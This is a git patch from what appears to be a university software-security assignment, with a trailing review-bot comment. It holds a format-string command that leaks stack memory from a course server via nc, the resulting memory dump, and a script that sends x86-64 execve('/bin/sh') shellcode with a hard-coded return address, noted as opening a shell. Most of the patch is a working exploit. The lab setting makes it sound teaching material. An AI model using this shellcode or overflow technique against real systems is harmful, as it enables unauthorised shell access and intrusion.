From 764292bdc5b0bd6dcf9d1e0667f9990a96036245 Mon Sep 17 00:00:00 2001
From: Mart Lubbers
Date: Mon, 16 Mar 2015 11:12:29 +0100
Subject: [PATCH] Finished assignemnt 5b
---
 .../exercise2 | 82 ++++++++++++++-----
 .../exercise2e.sh | 21 +++--
 .../exercise2f | 1 +
 3 files changed, 72 insertions(+), 32 deletions(-)
 create mode 100644 ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2f
diff --git a/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2 b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2
index 21c3798..834ddc7 100644
--- a/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2
+++ b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2
@@ -3,26 +3,66 @@ The buffer is probably 104 characters wide. All characters over 104 will not be echoed. b,c)
-printf "%20s\n" | sed 's/ /%lx&/g' | nc hackme.cs.ru.nl 2266
+printf "%52s\n" | sed 's/ /%p/g' | nc hackme.cs.ru.nl 2266 |\ sed 's/(nil)\|0x/\n&/g'
 Memory:
-7ffff7ff8050
-7ffff7dd8de0
-fbad2088
-20786c2520786c25
-20786c2520786c25
-20786c2520786c25
-20786c2520786c25
-20786c2520786c25
-20786c2520786c25
-20786c2520786c25
-20786c2520786c25
-20786c2520786c25
-20786c2520786c25
-20786c2520786c25
-20786c2520786c25
-7fffffffeb00 saved frame pointer
-4004c1 return address
-1 return value
-7fffffffeb30
-7fffffffebc0
+0x7ffff7ff8066
+0x7ffff7dd8de0
+0xfbad2088
+0x7025702570257025
+0x7025702570257025
+0x7025702570257025
+0x7025702570257025
+0x7025702570257025
+0x7025702570257025
+0x7025702570257025
+0x7025702570257025
+0x7025702570257025
+0x7025702570257025
+0x7025702570257025
+0x7025702570257025
+0x7025702570257025
+0x7025702570257025
+0x702570257025
+0x7fffffffeb40
+0x7fffffffebd0 Saved frame pointer
+0x4006a9 Return pointer
+(nil)
+0x100400530
+0x7fffffffebe0
+0x4006c2
+(nil)
+0x7ffff7a70ead
+(nil)
+0x7fffffffecc8
+0x100000000
+0x4006b9
+(nil)
+0x1aad25fd1bef7a81
+0x400530
+0x7fffffffecc0
+(nil)
+(nil)
+0xe552da02cc0f7a81
+0xe552cab3073f7a81
+0x7fff00000000
+(nil)
+(nil)
+0x4006e0
+0x7fffffffecc8
+0x1
+(nil)
+(nil)
+0x400530
+0x7fffffffecc0
+(nil)
+0x400559
+
+30 bytes shell codes
+14 bytes in de zooi
+94 bytes zooi
+
+104 zooi
+8 bytes waarde?
+8 frame pointer?
+8 return pointer
diff --git a/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2e.sh b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2e.sh
index 2f62e90..0839a7b 100644
--- a/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2e.sh
+++ b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2e.sh
@@ -1,11 +1,10 @@
-shellcode="\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
-
-#Illegal instruction
-returnvalue="\x7f\xff\xf7\xff\xeb\x30"
-fillers=$(printf "%42s" | sed 's/ /\\x0f\\x1f/g')
-
-returnvalue="\x7f\xff\xf7\xff\xeb\x30"
-fillers=$(printf "%39s" | sed 's/ /\\x0f\\x1f/g')
-
-
-cat <(echo -e "${fillers}${shellcode}${returnvalue}\n") - | nc hackme.cs.ru.nl 2266
+{ # Print padding and stack inspection
+ printf "......%34s" | sed 's/ /%p/g'
+ # Print shell code
+ printf "\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1"
+ printf "\xeb\x08\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
+ # Overwrite frame pointer and top of stack pointer print return address
+ printf "%16s\x50\xeb\xff\xff\xff\x7f\n"
+ # Start reading from stdin and echoing it to stdout
+ cat
+} | nc hackme.cs.ru.nl 2266
diff --git a/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2f b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2f
new file mode 100644
index 0000000..7213a3c
--- /dev/null
+++ b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2f
@@ -0,0 +1 @@
+Just run exercise2e.sh with bash and it will open a shell.
-- 
2.20.1
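Review bot: exercise2e.sh still has no interpreter line, although the new `printf "\x48..."` lines depend on bash's `\x` escape (POSIX printf does not guarantee it) and exercise2f tells the reader to run the file with bash; add `#!/usr/bin/env bash` as the first line so the file documents its own requirement. The comment `# Overwrite frame pointer and top of stack pointer print return address` is hard to parse; I would reword it to `# 16 filler bytes, then the 6 address bytes recorded in the %p dump of exercise2`. Those address bytes are hard-coded, and the note in exercise2 ("8 frame pointer? 8 return pointer") is presumably where they come from, so the comment should say that they are tied to the layout observed there and that this exercise setup apparently presupposes the usual mitigations (ASLR, non-executable stack, stack canaries) are absent. The host and port given to `nc` are repeated from exercise2; a variable at the top of the script would keep them in one place.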